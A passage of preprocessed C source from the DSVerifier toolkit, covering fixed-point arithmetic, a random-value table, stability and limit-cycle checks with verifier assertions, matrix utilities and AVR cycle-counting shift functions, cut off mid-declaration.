int_fast16_t; typedef long int int_fast32_t; typedef long int int_fast64_t; # 71 "/usr/include/stdint.h" 3 4 typedef unsigned char uint_fast8_t; typedef unsigned long int uint_fast16_t; typedef unsigned long int uint_fast32_t; typedef unsigned long int uint_fast64_t; # 87 "/usr/include/stdint.h" 3 4 typedef long int intptr_t; typedef unsigned long int uintptr_t; # 101 "/usr/include/stdint.h" 3 4 typedef __intmax_t intmax_t; typedef __uintmax_t uintmax_t; # 10 "/usr/lib/gcc/x86_64-linux-gnu/9/include/stdint.h" 2 3 4 # 28 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/fixed-point.h" 2 # 1 "/usr/include/inttypes.h" 1 3 4 # 34 "/usr/include/inttypes.h" 3 4 typedef int __gwchar_t; # 266 "/usr/include/inttypes.h" 3 4 typedef struct { long int quot; long int rem; } imaxdiv_t; # 290 "/usr/include/inttypes.h" 3 4 extern intmax_t imaxabs (intmax_t __n) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__const__)); extern imaxdiv_t imaxdiv (intmax_t __numer, intmax_t __denom) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__const__)); extern intmax_t strtoimax (const char *__restrict __nptr, char **__restrict __endptr, int __base) __attribute__ ((__nothrow__ , __leaf__)); extern uintmax_t strtoumax (const char *__restrict __nptr, char ** __restrict __endptr, int __base) __attribute__ ((__nothrow__ , __leaf__)); extern intmax_t wcstoimax (const __gwchar_t *__restrict __nptr, __gwchar_t **__restrict __endptr, int __base) __attribute__ ((__nothrow__ , __leaf__)); extern uintmax_t wcstoumax (const __gwchar_t *__restrict __nptr, __gwchar_t ** __restrict __endptr, int __base) __attribute__ ((__nothrow__ , __leaf__)); # 432 "/usr/include/inttypes.h" 3 4 # 29 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/fixed-point.h" 2 # 30 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/fixed-point.h" extern implementation impl; typedef int64_t fxp_t; fxp_t _fxp_one; fxp_t _fxp_half; fxp_t _fxp_minus_one; fxp_t _fxp_min; fxp_t _fxp_max; double _dbl_max; double _dbl_min; fxp_t _fxp_fmask; fxp_t _fxp_imask; static const double scale_factor[31] = { 1.0, 2.0, 4.0, 8.0, 16.0, 32.0, 64.0, 128.0, 256.0, 512.0, 1024.0, 2048.0, 4096.0, 8192.0, 16384.0, 32768.0, 65536.0, 131072.0, 262144.0, 524288.0, 1048576.0, 2097152.0, 4194304.0, 8388608.0, 16777216.0, 33554432.0, 67108864.0, 134217728.0, 268435456.0, 536870912.0, 1073741824.0 }; static const double scale_factor_inv[31] = { 1.0, 0.5, 0.25, 0.125, 0.0625, 0.03125, 0.015625, 0.0078125, 0.00390625, 0.001953125, 0.0009765625, 0.00048828125, 0.000244140625, 0.0001220703125, 0.00006103515625, 0.000030517578125, 0.000015258789063, 0.000007629394531, 0.000003814697266, 0.000001907348633, 0.000000953674316, 0.000000476837158, 0.000000238418579, 0.000000119209290, 0.000000059604645, 0.000000029802322, 0.000000014901161, 0.000000007450581, 0.000000003725290, 0.000000001862645, 0.000000000931323 }; static const float rand_uni[10000] = { -0.486240329978498f, -0.0886462298529236f, -0.140307596103306f, 0.301096597450952f, 0.0993171079928659f, 0.971751769763271f, 0.985173975730828f, 0.555993645184930f, 0.582088652691427f, -0.153377496651175f, 0.383610009058905f, -0.335724126391271f, 0.978768141636516f, -0.276250018648572f, 0.390075705739569f, -0.179022404038782f, 0.690083827115783f, -0.872530132490992f, -0.970585763293203f, -0.581476053441704f, -0.532614615674888f, -0.239699306693312f, -0.678183014035494f, 0.349502640932782f, -0.210469890686263f, 0.841262085391842f, -0.473585465151401f, 0.659383565443701f, -0.651160036945754f, -0.961043527561335f, -0.0814927639199137f, 0.621303110569702f, -0.784529166943541f, 0.0238464770757800f, 0.392694728594110f, 0.776848735202001f, 0.0870059709310509f, 0.880563655271790f, 0.883457036977564f, -0.249235082877382f, -0.691040749216870f, 0.578731120064320f, -0.973932858000832f, -0.117699105431720f, -0.723831748151088f, -0.483149657477524f, -0.821277691383664f, -0.459725618100875f, 0.148175952221864f, 0.444306875534854f, -0.325610376336498f, 0.544142311404910f, -0.165319440455435f, 0.136706800705517f, 0.543312481350682f, 0.467210959764607f, -0.349266618228534f, -0.660110730565862f, 0.910332331495431f, 0.961049802789367f, -0.786168905164629f, 0.305648402726554f, 0.510815258508885f, 0.0950733260984060f, 0.173750645487898f, 0.144488668408672f, 0.0190031984466126f, -0.299194577636724f, 0.302411647442273f, -0.730462524226212f, 0.688646006554796f, 0.134948379722118f, 0.533716723458894f, -0.00226300779660438f, -0.561340777806718f, 0.450396313744017f, -0.569445876566955f, 0.954155246557698f, -0.255403882430676f, -0.759820984120828f, -0.855279790307514f, -0.147352581758156f, -0.302269055643746f, -0.642038024364086f, -0.367405981107491f, 0.491844011712164f, -0.542191710121194f, -0.938294043323732f, 0.683979894338020f, 0.294728290855287f, 0.00662691839443919f, -0.931040350582855f, 0.152356209974418f, 0.678620860551457f, -0.534989269238408f, 0.932096367913226f, -0.0361062818028513f, -0.847189697149530f, -0.975903030160255f, 0.623293205784014f, -0.661289688031659f, 0.724486055119603f, 0.307504095172835f, 0.00739266163731767f, -0.393681596442097f, 0.0313739422974388f, 0.0768157689673350f, -0.652063346886817f, 0.864188030044388f, -0.588932092781034f, 0.496015896758580f, -0.872858269231211f, 0.978780599551039f, -0.504887732991147f, -0.462378791937628f, 0.0141726829338038f, 0.769610007653591f, 0.945233033188923f, -0.782235375325016f, -0.832206533738799f, 0.745634368088673f, -0.696969510157151f, -0.0674631869948374f, -0.123186450806584f, -0.359158959141949f, -0.393882649464391f, 0.441371446689899f, -0.829394270569736f, -0.301502651277431f, -0.996215501187289f, 0.934634037393066f, -0.282431114746289f, -0.927550795619590f, -0.437037530043415f, -0.360426812995980f, 0.949549724575862f, 0.502784616197919f, 0.800771681422909f, -0.511398929004089f, 0.309288504642554f, -0.207261227890933f, 0.930587995125773f, -0.777029876696670f, -0.489329175755640f, -0.134595132329858f, 0.285771358983518f, 0.182331373854387f, -0.544110494560697f, 0.278439882883985f, -0.556325158102182f, 0.579043806545889f, 0.134648133801916f, 0.602850725479294f, -0.151663563868883f, 0.180694361855878f, -0.651591295315595f, 0.281129147768056f, -0.580047306475484f, 0.687883075491433f, 0.279398670804288f, -0.853428128249503f, -0.532609367372680f, -0.821156786377917f, -0.181273229058573f, -0.983898569846882f, -0.0964374318311501f, 0.880923372124250f, 0.102643371392389f, 0.893615387135596f, -0.259276649383649f, 0.699287743639363f, 0.402940604635828f, -0.110721596226581f, 0.0846246472582877f, 0.820733021865405f, 0.795578903285308f, -0.495144122011537f, 0.273150029257472f, -0.268249949701437f, 0.231982193341980f, 0.694211299124074f, 0.859950868718233f, 0.959483382623794f, -0.422972626833543f, -0.109621798738360f, 0.433094703426531f, 0.694025903378851f, 0.374478987547435f, -0.293668545105608f, -0.396213864190828f, -0.0632095887099047f, -0.0285139536748673f, 0.831794132192390f, -0.548543088139238f, 0.791869201724680f, 0.325211484201845f, 0.155274810721772f, -0.112383643064821f, -0.674403070297721f, 0.642801068229810f, -0.615712048835242f, -0.322576771285566f, -0.409336818836595f, 0.548069973193770f, -0.386353709407947f, -0.0741664985357784f, 0.619639599324983f, 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kLowerBound, fxp_t kUpperBound) { int32_t range_size = kUpperBound - kLowerBound + 1; if (kX < kLowerBound){ kX += range_size * ((kLowerBound - kX) / range_size + 1); } return kLowerBound + (kX - kLowerBound) % range_size; } fxp_t fxp_get_int_part(fxp_t in) { return ((in < 0) ? -((-in) & _fxp_imask) : in & _fxp_imask); } fxp_t fxp_get_frac_part(fxp_t in) { return ((in < 0) ? -((-in) & _fxp_fmask) : in & _fxp_fmask); } float fxp_to_float(fxp_t fxp); fxp_t fxp_quantize(fxp_t aquant) { if (overflow_mode == 2) { if(aquant < _fxp_min) { return _fxp_min; } else if(aquant > _fxp_max) { return _fxp_max; } } else if (overflow_mode == 3) { if(aquant < _fxp_min || aquant > _fxp_max) { return wrap(aquant, _fxp_min, _fxp_max); } } return (fxp_t) aquant; } void fxp_verify_overflow(fxp_t value){ fxp_quantize(value); printf("An Overflow Occurred in system's output"); __DSVERIFIER_assert(value <= _fxp_max && value >= _fxp_min); } void fxp_verify_overflow_node(fxp_t value, char* msg){ if (1 == 2) { printf("%s",msg); __DSVERIFIER_assert(value <= _fxp_max && value >= _fxp_min); } } void fxp_verify_overflow_array(fxp_t array[], int n){ int i=0; for(i=0; i<n;i++){ fxp_verify_overflow(array[i]); } } fxp_t fxp_int_to_fxp(int in) { fxp_t lin; lin = (fxp_t) in*_fxp_one; return lin; } int fxp_to_int(fxp_t fxp) { if(fxp >= 0){ fxp += _fxp_half; } else { fxp -= _fxp_half; } fxp >>= impl.frac_bits; return (int) fxp; } fxp_t fxp_float_to_fxp(float f) { fxp_t tmp; double ftemp; ftemp = f * scale_factor[impl.frac_bits]; if(f >= 0) { tmp = (fxp_t)(ftemp + 0.5); } else { tmp = (fxp_t)(ftemp - 0.5); } return tmp; } fxp_t fxp_double_to_fxp(double value) { fxp_t tmp; double ftemp = value * scale_factor[impl.frac_bits]; if (rounding_mode == 0){ if(value >= 0) { tmp = (fxp_t)(ftemp + 0.5); } else { tmp = (fxp_t)(ftemp - 0.5); } } else if(rounding_mode == 1){ tmp = (fxp_t) ftemp; double residue = ftemp - tmp; if ((value < 0) && (residue != 0)){ ftemp = ftemp - 1; tmp = (fxp_t) ftemp; } } else if (rounding_mode == 0){ tmp = (fxp_t) ftemp; } return tmp; } void fxp_float_to_fxp_array(float f[], fxp_t r[], int N) { int i; for(i = 0; i < N; ++i) { r[i] = fxp_float_to_fxp(f[i]); } } void fxp_double_to_fxp_array(double f[], fxp_t r[], int N) { int i; for(i = 0; i < N; ++i) { r[i] = fxp_double_to_fxp(f[i]); } } # 275 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/fixed-point.h" float fxp_to_float(fxp_t fxp) { float f; int f_int = (int) fxp; f = f_int * scale_factor_inv[impl.frac_bits]; return f; } double fxp_to_double(fxp_t fxp) { double f; int f_int = (int) fxp; f = f_int * scale_factor_inv[impl.frac_bits]; return f; } void fxp_to_float_array(float f[], fxp_t r[], int N) { int i; for(i = 0; i < N; ++i) { f[i] = fxp_to_float(r[i]); } } void fxp_to_double_array(double f[], fxp_t r[], int N) { int i; for(i = 0; i < N; ++i) { f[i] = fxp_to_double(r[i]); } } fxp_t fxp_abs(fxp_t a) { fxp_t tmp; tmp = ((a < 0) ? -(fxp_t)(a) : a); tmp = fxp_quantize(tmp); return tmp; } fxp_t fxp_add(fxp_t aadd, fxp_t badd) { fxp_t tmpadd; tmpadd = ((fxp_t)(aadd) + (fxp_t)(badd)); tmpadd = fxp_quantize(tmpadd); return tmpadd; } fxp_t fxp_sub(fxp_t asub, fxp_t bsub) { fxp_t tmpsub; tmpsub = (fxp_t)((fxp_t)(asub) - (fxp_t)(bsub)); tmpsub = fxp_quantize(tmpsub); return tmpsub; } fxp_t fxp_mult(fxp_t amult, fxp_t bmult) { fxp_t tmpmult, tmpmultprec; tmpmult = (fxp_t)((fxp_t)(amult)*(fxp_t)(bmult)); if (tmpmult >= 0) { tmpmultprec = (tmpmult + ((tmpmult & 1 << (impl.frac_bits - 1)) << 1)) >> impl.frac_bits; } else { tmpmultprec = -(((-tmpmult) + (((-tmpmult) & 1 << (impl.frac_bits - 1)) << 1)) >> impl.frac_bits); } tmpmultprec = fxp_quantize(tmpmultprec); return tmpmultprec; } # 372 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/fixed-point.h" fxp_t fxp_div(fxp_t a, fxp_t b){ __DSVERIFIER_assume( b!=0 ); fxp_t tmpdiv = ((a << impl.frac_bits) / b); tmpdiv = fxp_quantize(tmpdiv); return tmpdiv; } fxp_t fxp_neg(fxp_t aneg) { fxp_t tmpneg; tmpneg = -(fxp_t)(aneg); tmpneg = fxp_quantize(tmpneg); return tmpneg; } # 398 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/fixed-point.h" fxp_t fxp_sign(fxp_t a) { return ((a == 0) ? 0 : ((a < 0) ? _fxp_minus_one : _fxp_one) ); } fxp_t fxp_shrl(fxp_t in, int shift) { return (fxp_t) (((unsigned int) in) >> shift); } fxp_t fxp_square(fxp_t a) { return fxp_mult(a, a); } void fxp_print_int(fxp_t a) { printf("\n%i", (int32_t)a); } void fxp_print_float(fxp_t a) { printf("\n%f", fxp_to_float(a)); } void fxp_print_float_array(fxp_t a[], int N) { int i; for(i = 0; i < N; ++i) { printf("\n%f", fxp_to_float(a[i])); } } void print_fxp_array_elements(char * name, fxp_t * v, int n){ printf("%s = {", name); int i; for(i=0; i < n; i++){ printf(" %jd ", v[i]); } printf("}\n"); } # 23 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2 # 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/util.h" 1 # 24 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/util.h" void initialize_array(double v[], int n){ int i; for(i=0; i<n; i++){ v[i] = 0; } } void revert_array(double v[], double out[], int n){ initialize_array(out,n); int i; for(i=0; i<n; i++){ out[i] = v[n-i-1]; } } double internal_pow(double a, double b){ int i; double acc = 1; for (i=0; i < b; i++){ acc = acc*a; } return acc; } double internal_abs(double a){ return a < 0 ? -a : a; } int fatorial(int n){ return n == 0 ? 1 : n * fatorial(n-1); } int check_stability(double a[], int n){ int lines = 2 * n - 1; int columns = n; double m[lines][n]; int i,j; double current_stability[n]; for (i=0; i < n; i++){ current_stability[i] = a[i]; } double sum = 0; for (i=0; i < n; i++){ sum += a[i]; } if (sum <= 0){ printf("[DEBUG] the first constraint of Jury criteria failed: (F(1) > 0)"); return 0; } sum = 0; for (i=0; i < n; i++){ sum += a[i] * internal_pow(-1, n-1-i); } sum = sum * internal_pow(-1, n-1); if (sum <= 0){ printf("[DEBUG] the second constraint of Jury criteria failed: (F(-1)*(-1)^n > 0)"); return 0; } if (internal_abs(a[n-1]) > a[0]){ printf("[DEBUG] the third constraint of Jury criteria failed: (abs(a0) < a_{n}*z^{n})"); return 0; } for (i=0; i < lines; i++){ for (j=0; j < columns; j++){ m[i][j] = 0; } } for (i=0; i < lines; i++){ for (j=0; j < columns; j++){ if (i == 0){ m[i][j] = a[j]; continue; } if (i % 2 != 0 ){ int x; for(x=0; x<columns;x++){ m[i][x] = m[i-1][columns-x-1]; } columns = columns - 1; j = columns; }else{ m[i][j] = m[i-2][j] - (m[i-2][columns] / m[i-2][0]) * m[i-1][j]; } } } int first_is_positive = m[0][0] >= 0 ? 1 : 0; for (i=0; i < lines; i++){ if (i % 2 == 0){ int line_is_positive = m[i][0] >= 0 ? 1 : 0; if (first_is_positive != line_is_positive){ return 0; } continue; } } return 1; } void poly_sum(double a[], int Na, double b[], int Nb, double ans[], int Nans){ int i; Nans = Na>Nb? Na:Nb; for (i=0; i<Nans; i++){ if (Na>Nb){ ans[i]=a[i]; if (i > Na-Nb-1){ ans[i]=ans[i]+b[i-Na+Nb]; } }else { ans[i]=b[i]; if (i> Nb - Na -1){ ans[i]=ans[i]+a[i-Nb+Na]; } } } } void poly_mult(double a[], int Na, double b[], int Nb, double ans[], int Nans){ int i; int j; int k; Nans = Na+Nb-1; for (i=0; i<Na; i++){ for (j=0; j<Nb; j++){ k= Na + Nb - i - j - 2; ans[k]=0; } } for (i=0; i<Na; i++){ for (j=0; j<Nb; j++){ k= Na + Nb - i - j - 2; ans[k]=ans[k]+a[Na - i - 1]*b[Nb - j - 1]; } } } void double_check_oscillations(double * y, int y_size){ __DSVERIFIER_assume(y[0] != y[y_size - 1]); int window_timer = 0; int window_count = 0; int i, j; for (i = 2; i < y_size; i++){ int window_size = i; for(j=0; j<y_size; j++){ if (window_timer > window_size){ window_timer = 0; window_count = 0; } int window_index = j + window_size; if (window_index < y_size){ if (y[j] == y[window_index]){ window_count++; # 209 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/util.h" 3 4 ((void) sizeof (( # 209 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/util.h" !(window_count == window_size) # 209 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/util.h" 3 4 ) ? 1 : 0), __extension__ ({ if ( # 209 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/util.h" !(window_count == window_size) # 209 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/util.h" 3 4 ) ; else __assert_fail ( # 209 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/util.h" "!(window_count == window_size)" # 209 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/util.h" 3 4 , "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/util.h", 209, __extension__ __PRETTY_FUNCTION__); })) # 209 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/util.h" ; } }else{ break; } window_timer++; } } } void double_check_limit_cycle(double * y, int y_size){ double reference = y[y_size - 1]; int idx = 0; int window_size = 1; for(idx = (y_size-2); idx >= 0; idx--){ if (y[idx] != reference){ window_size++; }else{ break; } } __DSVERIFIER_assume(window_size != y_size && window_size != 1); printf("window_size %d\n", window_size); int desired_elements = 2 * window_size; int found_elements = 0; for(idx = (y_size-1); idx >= 0; idx--){ if (idx > (y_size-window_size-1)){ printf("%.0f == %.0f\n", y[idx], y[idx-window_size]); int cmp_idx = idx - window_size; if ((cmp_idx > 0) && (y[idx] == y[idx-window_size])){ found_elements = found_elements + 2; }else{ break; } } } printf("desired_elements %d\n", desired_elements); printf("found_elements %d\n", found_elements); __DSVERIFIER_assert(desired_elements != found_elements); } void double_check_persistent_limit_cycle(double * y, int y_size){ int idy = 0; int count_same = 0; int window_size = 0; double reference = y[0]; for(idy = 0; idy < y_size; idy++){ if (y[idy] != reference){ window_size++; } else if (window_size != 0){ break; } else { count_same++; } } window_size += count_same; __DSVERIFIER_assume(window_size > 1 && window_size <= y_size/2); double lco_elements[window_size]; for(idy = 0; idy < y_size; idy++){ if (idy < window_size){ lco_elements[idy] = y[idy]; } } idy = 0; int lco_idy = 0; _Bool is_persistent = 0; while (idy < y_size){ if(y[idy++] == lco_elements[lco_idy++]){ is_persistent = 1; }else{ is_persistent = 0; break; } if (lco_idy == window_size){ lco_idy = 0; } } __DSVERIFIER_assert(is_persistent == 0); } void print_array_elements(char * name, double * v, int n){ printf("%s = {", name); int i; for(i=0; i < n; i++){ printf(" %.32f ", v[i]); } printf("}\n"); } void double_add_matrix( unsigned int lines, unsigned int columns, double m1[4][4], double m2[4][4], double result[4][4]){ unsigned int i, j; for (i = 0; i < lines; i++){ for (j = 0; j < columns; j++){ result[i][j] = m1[i][j] + m2[i][j]; } } } void double_sub_matrix( unsigned int lines, unsigned int columns, double m1[4][4], double m2[4][4], double result[4][4]){ unsigned int i, j; for (i = 0; i < lines; i++){ for (j = 0; j < columns; j++){ result[i][j] = m1[i][j] - m2[i][j]; } } } void double_matrix_multiplication( unsigned int i1, unsigned int j1, unsigned int i2, unsigned int j2, double m1[4][4], double m2[4][4], double m3[4][4]){ unsigned int i, j, k; if (j1 == i2) { for (i=0; i<i1; i++) { for (j=0; j<j2; j++) { m3[i][j] = 0; } } for (i=0;i<i1; i++) { for (j=0; j<j2; j++) { for (k=0; k<j1; k++) { double mult = (m1[i][k] * m2[k][j]); m3[i][j] = m3[i][j] + (m1[i][k] * m2[k][j]); } } } } else { printf("\nError! Operation invalid, please enter with valid matrices.\n"); } } void fxp_matrix_multiplication( unsigned int i1, unsigned int j1, unsigned int i2, unsigned int j2, fxp_t m1[4][4], fxp_t m2[4][4], fxp_t m3[4][4]){ unsigned int i, j, k; if (j1 == i2) { for (i=0; i<i1; i++) { for (j=0; j<j2; j++) { m3[i][j] = 0; } } for (i=0;i<i1; i++) { for (j=0; j<j2; j++) { for (k=0; k<j1; k++) { m3[i][j] = fxp_add( m3[i][j], fxp_mult(m1[i][k] , m2[k][j])); } } } } else { printf("\nError! Operation invalid, please enter with valid matrices.\n"); } } void fxp_exp_matrix(unsigned int lines, unsigned int columns, fxp_t m1[4][4], unsigned int expNumber, fxp_t result[4][4]){ unsigned int i, j, l, k; fxp_t m2[4][4]; if(expNumber == 0){ for (i = 0; i < lines; i++){ for (j = 0; j < columns; j++){ if(i == j){ result[i][j] = fxp_double_to_fxp(1.0); } else { result[i][j] = 0.0; } } } return; } for (i = 0; i < lines; i++) for (j = 0; j < columns; j++) result[i][j] = m1[i][j]; if(expNumber == 1){ return; } for(l = 1; l < expNumber; l++){ for (i = 0; i < lines; i++) for (j = 0; j < columns; j++) m2[i][j] = result[i][j]; for (i = 0; i < lines; i++) for (j = 0; j < columns; j++) result[i][j] = 0; for (i=0;i<lines; i++) { for (j=0; j<columns; j++) { for (k=0; k<columns; k++) { result[i][j] = fxp_add( result[i][j], fxp_mult(m2[i][k] , m1[k][j])); } } } } } void double_exp_matrix(unsigned int lines, unsigned int columns, double m1[4][4], unsigned int expNumber, double result[4][4]){ unsigned int i, j, k, l; double m2[4][4]; if(expNumber == 0){ for (i = 0; i < lines; i++){ for (j = 0; j < columns; j++){ if(i == j){ result[i][j] = 1.0; } else { result[i][j] = 0.0; } } } return; } for (i = 0; i < lines; i++) for (j = 0; j < columns; j++) result[i][j] = m1[i][j]; if(expNumber == 1){ return; } for(l = 1; l < expNumber; l++){ for (i = 0; i < lines; i++) for (j = 0; j < columns; j++) m2[i][j] = result[i][j]; for (i = 0; i < lines; i++) for (j = 0; j < columns; j++) result[i][j] = 0; for (i=0;i<lines; i++) { for (j=0; j<columns; j++) { for (k=0; k<columns; k++) { result[i][j] = result[i][j] + (m2[i][k] * m1[k][j]); } } } } } void fxp_add_matrix( unsigned int lines, unsigned int columns, fxp_t m1[4][4], fxp_t m2[4][4], fxp_t result[4][4]){ unsigned int i, j; for (i = 0; i < lines; i++) for (j = 0; j < columns; j++) { result[i][j] = fxp_add(m1[i][j] , m2[i][j]); } } void fxp_sub_matrix( unsigned int lines, unsigned int columns, fxp_t m1[4][4], fxp_t m2[4][4], fxp_t result[4][4]){ unsigned int i, j; for (i = 0; i < lines; i++) for (j = 0; j < columns; j++) result[i][j] = fxp_sub(m1[i][j] , m2[i][j]); } void print_matrix(double matrix[4][4], unsigned int lines, unsigned int columns){ printf("\nMatrix\n=====================\n\n"); unsigned int i, j; for (i=0; i<lines; i++) { for (j=0; j<columns; j++) { printf("#matrix[%d][%d]: %2.2f ", i,j,matrix[i][j]); } printf("\n"); } printf("\n"); } double determinant(double a[4][4],int n) { int i,j,j1,j2; double det = 0; double m[4][4]; if (n < 1) { } else if (n == 1) { det = a[0][0]; } else if (n == 2) { det = a[0][0] * a[1][1] - a[1][0] * a[0][1]; } else { det = 0; for (j1=0;j1<n;j1++) { for (i=0;i<n-1;i++) for (i=1;i<n;i++) { j2 = 0; for (j=0;j<n;j++) { if (j == j1) continue; m[i-1][j2] = a[i][j]; j2++; } } det += internal_pow(-1.0,1.0+j1+1.0) * a[0][j1] * determinant(m,n-1); } } return(det); } double fxp_determinant(fxp_t a_fxp[4][4],int n) { int i,j,j1,j2; double a[4][4]; for(i=0; i<n;i++){ for(j=0; j<n;j++){ a[i][j]= fxp_to_double(a_fxp[i][j]); } } double det = 0; double m[4][4]; if (n < 1) { } else if (n == 1) { det = a[0][0]; } else if (n == 2) { det = a[0][0] * a[1][1] - a[1][0] * a[0][1]; } else { det = 0; for (j1=0;j1<n;j1++) { for (i=0;i<n-1;i++) for (i=1;i<n;i++) { j2 = 0; for (j=0;j<n;j++) { if (j == j1) continue; m[i-1][j2] = a[i][j]; j2++; } } det += internal_pow(-1.0,1.0+j1+1.0) * a[0][j1] * determinant(m,n-1); } } return(det); } void transpose(double a[4][4], double b[4][4],int n, int m) { int i,j; for (i=0;i<n;i++) { for (j=0;j<m;j++) { b[j][i] = a[i][j]; } } } void fxp_transpose(fxp_t a[4][4], fxp_t b[4][4],int n, int m) { int i,j; for (i=0;i<n;i++) { for (j=0;j<m;j++) { b[j][i] = a[i][j]; } } } # 24 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2 # 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 1 # 19 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" extern int generic_timer; extern hardware hw; double generic_timing_shift_l_double(double zIn, double z[], int N) { generic_timer += ((2 * hw.assembly.push) + (3 * hw.assembly.in) + (3 * hw.assembly.out) + (1 * hw.assembly.sbiw) + (1 * hw.assembly.cli) + (8 * hw.assembly.std)); int i; double zOut; zOut = z[0]; generic_timer += ((5 * hw.assembly.ldd) + (2 * hw.assembly.mov) + (4 * hw.assembly.std) + (1 * hw.assembly.ld)); generic_timer += ((2 * hw.assembly.std) + (1 * hw.assembly.rjmp)); for (i = 0; i < N - 1; i++) { generic_timer += ((17 * hw.assembly.ldd) + (4 * hw.assembly.lsl) + (4 * hw.assembly.rol) + (2 * hw.assembly.add) + (2 * hw.assembly.adc) + (6 * hw.assembly.mov) + (2 * hw.assembly.adiw) + (5 * hw.assembly.std) + (1 * hw.assembly.ld) + (1 * hw.assembly.st) + (1 * hw.assembly.subi) + (1 * hw.assembly.sbc)+ (1 * hw.assembly.cp) + (1 * hw.assembly.cpc) + (1 * hw.assembly.brlt)); z[i] = z[i + 1]; } z[N - 1] = zIn; generic_timer += ((12 * hw.assembly.ldd) + (6 * hw.assembly.mov) + (3 * hw.assembly.std) + (2 * hw.assembly.lsl) + (2 * hw.assembly.rol) + (1 * hw.assembly.adc) + (1 * hw.assembly.add) + (1 * hw.assembly.subi) + (1 * hw.assembly.sbci) + (1 * hw.assembly.st) + (1 * hw.assembly.adiw) + (1 * hw.assembly.in)+ (1 * hw.assembly.cli)); generic_timer += ((3 * hw.assembly.out) + (2 * hw.assembly.pop) + (1 * hw.assembly.ret)); return (zOut); } double generic_timing_shift_r_double(double zIn, double z[], int N) { generic_timer += ((2 * hw.assembly.push) + (3 * hw.assembly.in) + (3 * hw.assembly.out) + (1 * hw.assembly.sbiw) + (1 * hw.assembly.cli) + (8 * hw.assembly.std)); int i; double zOut; zOut = z[N - 1]; generic_timer += ((7 * hw.assembly.ldd) + (2 * hw.assembly.rol) + (2 * hw.assembly.lsl) + (2 * hw.assembly.mov) + (4 * hw.assembly.std) + (1 * hw.assembly.add) + (1 * hw.assembly.adc) + (1 * hw.assembly.ld) + (1 * hw.assembly.subi) + (1 * hw.assembly.sbci)); generic_timer += ((2 * hw.assembly.ldd) + (2 * hw.assembly.std) + (1 * hw.assembly.sbiw) + (1 * hw.assembly.rjmp)); for (i = N - 1; i > 0; i--) { z[i] = z[i - 1]; generic_timer += ((15 * hw.assembly.ldd) + (4 * hw.assembly.lsl) + (4 * hw.assembly.rol) + (2 * hw.assembly.add) + (2 * hw.assembly.adc) + (4 * hw.assembly.mov) + (5 * hw.assembly.std) + (1 * hw.assembly.subi) + (1 * hw.assembly.sbci) + (1 * hw.assembly.ld) + (1 * hw.assembly.st) + (1 * hw.assembly.sbiw) + (1 * hw.assembly.cp) + (1 * hw.assembly.cpc) + (1 * hw.assembly.brlt)); } z[0] = zIn; generic_timer += ((10 * hw.assembly.ldd) + (5 * hw.assembly.mov) + (3 * hw.assembly.std) + (3 * hw.assembly.out) + (2 * hw.assembly.pop) + (1 * hw.assembly.ret) + (1 * hw.assembly.ret) + (1 * hw.assembly.cli) + (1 * hw.assembly.in) + (1 * hw.assembly.st) + (1 * hw.assembly.adiw)); return zOut; } fxp_t shiftL(fxp_t zIn, fxp_t z[], int N) { int i; fxp_t zOut; zOut = z[0]; for (i = 0; i < N - 1; i++) { z[i] = z[i + 1]; } z[N - 1] = zIn; return (zOut); } fxp_t shiftR(fxp_t zIn, fxp_t z[], int N) { int i; fxp_t zOut; zOut = z[N - 1]; for (i = N - 1; i > 0; i--) { z[i] = z[i - 1]; } z[0] = zIn; return zOut; } float shiftLfloat(float zIn, float z[], int N) { int i; float zOut; zOut = z[0]; for (i = 0; i < N - 1; i++) { z[i] = z[i + 1]; } z[N - 1] = zIn; return (zOut); } float shiftRfloat(float zIn, float z[], int N) { int i; float zOut; zOut = z[N - 1]; for (i = N - 1; i > 0; i--) { z[i] = z[i - 1]; } z[0] = zIn; return zOut; } double shiftRDdouble(double zIn, double z[], int N) { int i; double zOut; zOut = z[0]; for (i = 0; i < N - 1; i++) { z[i] = z[i + 1]; } z[N - 1] = zIn; return (zOut); } double shiftRdouble(double zIn, double z[], int N) { int i; double zOut; zOut = z[N - 1]; for (i = N - 1; i > 0; i--) { z[i] = z[i - 1]; } z[0] = zIn; return zOut; } double shiftLDouble(double zIn, double z[], int N) { int i; double zOut; zOut = z[0]; for (i = 0; i < N - 1; i++) { z[i] = z[i + 1]; } z[N - 1] = zIn; return (zOut); } void 